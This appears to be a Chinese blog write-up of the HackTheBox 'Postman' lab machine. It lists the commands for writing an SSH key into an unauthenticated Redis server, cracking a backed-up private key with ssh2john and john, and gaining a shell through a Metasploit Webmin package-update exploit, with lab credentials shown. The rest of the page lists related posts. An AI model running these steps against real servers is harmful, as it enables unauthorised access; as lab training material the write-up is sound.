Postman(HackTheBox)

最新推荐文章于 2022-11-22 01:52:41 发布
最新推荐文章于 2022-11-22 01:52:41 发布
阅读量809 收藏
点赞数
分类专栏: HackTheBox
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/test1988x/article/details/103921210
版权

HTB靶机wp

只为记录

redis未授权

ssh-keygen -t rsa -C "redis@fuck"
cd .ssh/
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > ssh.txt
redis-cli -h 10.10.10.160 flushall
cat ssh.txt | redis-cli -h 10.10.10.160 -x set ssh_key
redis-cli -h 10.10.10.160
CONFIG SET dir /var/lib/redis/.ssh/
CONFIG GET dir
CONFIG SET dbfilename "authorized_keys"
save
ssh -i fuck redis@10.10.10.160

连上去没有权限,使用这个提权 https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

找到一个敏感信息

[-] Location and Permissions (if accessible) of .bak file(s):
-rwxr-xr-x 1 Matt Matt 1743 Aug 26 00:11 /opt/id_rsa.bak
-rw------- 1 root root 695 Aug 25 21:24 /var/backups/group.bak
-rw------- 1 root shadow 577 Aug 25 21:24 /var/backups/gshadow.bak
-rw------- 1 root shadow 935 Aug 26 03:50 /var/backups/shadow.bak
-rw------- 1 root root 1382 Aug 25 23:48 /var/backups/passwd.bak

Matt用户的id_rsa.bak把他保存到本地为matt_key

要想使用john来破解,先要将其转为john支持的格式,这里使用ssh2john.py

./ssh2john.py /home/parrot/matt_key >  /home/parrot/matt_hash

这里要解压/usr/share/wordlists/rockyou.txt.gz
使用gunzip

john --wordlist=/usr/share/wordlists/rockyou.txt matt_hash
在这里插入图片描述

切换Matt用户

在这里插入图片描述

再次查看user.txt

在这里插入图片描述

得到一个flag

webmin

在这里插入图片描述
直接访问10.10.10.160:10000报错,修改本地hosts文件

再次访问,得到webmin的登录面板 使用Matt,computer2008可以登录

use exploit/linux/http/webmin_packageup_rce
set rhosts 10.10.10.160
set ssl true
set username Matt
set password computer2008
set lhost 10.10.14.207
exploit

在这里插入图片描述

本文参考

test1988x
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
postman 离线登录版
12-18
在IT行业中,尤其是对于Web开发者、测试人员以及系统管理员来说,Postman是一个不可或缺的工具。然而,新版本的Postman引入了账号登录的要求,这在某些地区可能会遇到网络访问问题,导致登录困难或速度慢。为了应对...
HTB靶机-Postman Write Up
weixin_43815032的博客
12-27 1061
0x00 引子 某日在安全客上刷到了这个文章《我是如何拿到OSCP认证的?》,读完之后感觉太TM励志了,教练我也考OSCP,说干就干,于是随手搜索了一些备战OSCP的分享,看了一些准备知识,先从靶场练起。 0x01 准备工作 ...
HTB-Postman
weixin_45434043的博客
03-20 1898
目录HTB - Postman[1]侦察和枚举[1.1]开放的端口[1.2]Web发现[1.3]Redis[1.4]Webmin[2]获得访问权限[2.1]创建公钥[2.2]发布密钥[2.3]获取Redis命令行-将密钥插入到内存之中[2.4]使用SSH登录获得访问权限[3]本地侦察和枚举[4]特权提升[4.1]用户透视[4.2]升级为root HTB - Postman [1]侦察和枚举 [1...
hack the boxpostman靶机
zr1213159840的博客
05-08 1578
还是正常打开靶机,然后使用nmap扫描。看看有什么端口是打开的。扫描结果显示,开启了22,80,6379,10000端口。其中6379端口和10000端口值得注意。 nmap -sV -Pn 10.10.10.160 (这有个非常奇怪的地方,我第一次做的时候namp以及masscan无论如何都扫描不出6379端口,但是直接访问又是可以,感觉很郁闷,直接在第一步卡住了。菜……) 我们分别打开80,10000端口看看。其中80端口就是一个简单的页面。 10000端口打开,是webmin,注意这个地方要采用
Hackthebox---Postman
qq_37027540的博客
01-28 871
Hackthebox靶机—Postman 获取内网ip 对靶机进行信息探测 发现存在四个端口开放(22,80,6379,10000),80端口和10000端口都是http服务,打开浏览器查看内容。 10000端口上起的服务是wenmin,使用searchspolit搜索存在漏洞,打开msfconsole,找到该模块,发现参数中需要账号密码,在浏览器上尝试一些弱密码都失败了,这里可...
【Hack The Box】linux练习-- Postman
人间体佐菲的博客
11-22 423
【Hack The Box】linux练习-- Postman
postman Mac版
08-18
Postman是一款广受欢迎的API开发和测试工具,尤其在Mac用户中备受青睐。它使得开发者能够轻松地发送HTTP请求,检查响应数据,进行接口调试,以及构建自动化测试套件。这款工具的强大之处在于其易用性和功能的全面性...
postman v9.0.5中文版
11-09
Postman是一款广受欢迎的API开发、测试和文档制作工具,尤其在Web开发领域中不可或缺。v9.0.5是其版本更新之一,为用户提供了一系列增强功能和改进。在这个中文版中,用户无需登录即可进行Websocket测试,使得对...
Postman Postman Postman
11-03
**Postman:强大的API开发与测试工具** Postman是一款广泛使用的API开发、测试和文档制作工具,深受开发者和测试人员的喜爱。它简化了接口的调试、集成测试以及协作流程,帮助用户更高效地构建和管理API。在本文中...
postman8.7版本比较好用
08-24
Postman是一款广受欢迎的API开发、测试和文档管理工具,尤其在Web开发者和API测试人员中备受推崇。本文将深入探讨Postman 8.7版本的特点及其为何在2022年后仍被认为是好用的选择。 首先,Postman的核心功能包括接口...
SSH2-interceptor拦截器(权限管理)
05-19
ssh2-interceptor拦截器(权限管理).
oscp——HTB——Postman
王嘟嘟的博客
04-13 1498
0x00 前言 这个是第一个做的hackthebox的机子,由于这个做出来的人数比较多,所以选择了这个,不知道难度怎么样,决定做一做。 0x01 实验 1.信息收集(端口) 这里由于不掌技巧,所以扫描花费了很久。。。。 这里可以看到开放了,22,80,6379,10000 所以指定扫描一下 2.攻击尝试 2.1 端口攻击尝试 这里肯定是要先考虑一下redis,毕竟有一个未授权访问 然后redi...
Postman:接口测试项目实战
不怕猫的耗子A
11-14 1万+
Postman接口测试项目实战 1、其实也不算什么实战吧,因为自己本来就没有什么完整的接口测试经验,只是在平常工作中用偶尔用Python写过接口测试用例。这个例子也是根据书里面来的 2、自己买了一本关于接口测试的书,写这些主要是对前面自己学的做一下巩固吧,虽然还是有很多地方没完全弄懂。所以这里用到的演练项目是书里面附带的资源,是用Python里面的Tornado框架写的一个Web页面,主要涉及...
Hackthebox------Jerry
大方子
11-24 3036
hackthebox网站:https://www.hackthebox.eu   这次我们的靶机叫-Jerry IP:10.10.10.95   ====================================================================================== 1.先用nmap对 目标靶机进行扫描 nmap -sC -sV...
Hack The Box -----------------------Active
大方子
12-16 6913
这次的靶机是Hackthebox的Active 靶机IP地址:10.10.10.100 ======================================================================================== 信息收集 nmap -sV -sT 10.10.10.100  Kerberos在88,netbios-ssn在13...
hackthebox - postman (考点:redis安全 & ssh2john & webmin安全)
冬萍子癸水
05-21 588
1 扫描 22想到可能会有ssh登录, 80进web搜集信息,包括用dirbuster扫目录,但是没找到什么有价值的。 10000是webmin是远程管理系统。也没账号密码。 6379是redis服务,网上也有很多科普这里。 理论上这应该是个在受信任内部环境运行的数据库工具,不应对外开放,既然对外了,可能这就是个利用突破口,可能连密码认证都没要。可以安装用这个工具利用apt install redis-tools Scanning 1 hosts [131070 ports/host] Discovered
POSTMAN调试接口post对象
weixin_30642869的博客
05-31 289
APP回传设备信息,设备信息对象里边包含以下字段 后台是java ssh接收 用对象属性自动封装比较方便 所以,使用 方式进行回传 而不是使用网上说的 设置如下图 转载于:https://www.cnblogs.com/jnhs/p/10954753.html...
hackthebox注册教程
热门推荐
shy的博客
02-01 1万+
官方网址:https://www.hackthebox.eu/ hackthebox是一个靶场,听说和vulnhub很像,最近迷上了做靶场,于是就像去hackthebox看看,发现还是注册,而且注册好像还没有那么简单 在首页的最下面有个join,进行点击 发现需要邀请码,上网搜了搜,发现邀请码得靠自己获取,好吧,我接受这个挑战。 使用view-source:https://www....
Postman禁止转发
weixin_34163553的博客
04-14 967
为什么80%的码农都做不了架构师?>>> ...
通过PostMan验证Oauth2认证过程.docx
最新发布
02-23
"通过PostMan验证Oauth2认证过程,主要涉及微服务中的认证和鉴权,使用API网关和OAuth2授权服务实现安全校验。" 在微服务架构中,认证和鉴权是保障系统安全性的重要环节。Oauth2是一种广泛使用的授权框架,它允许第...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值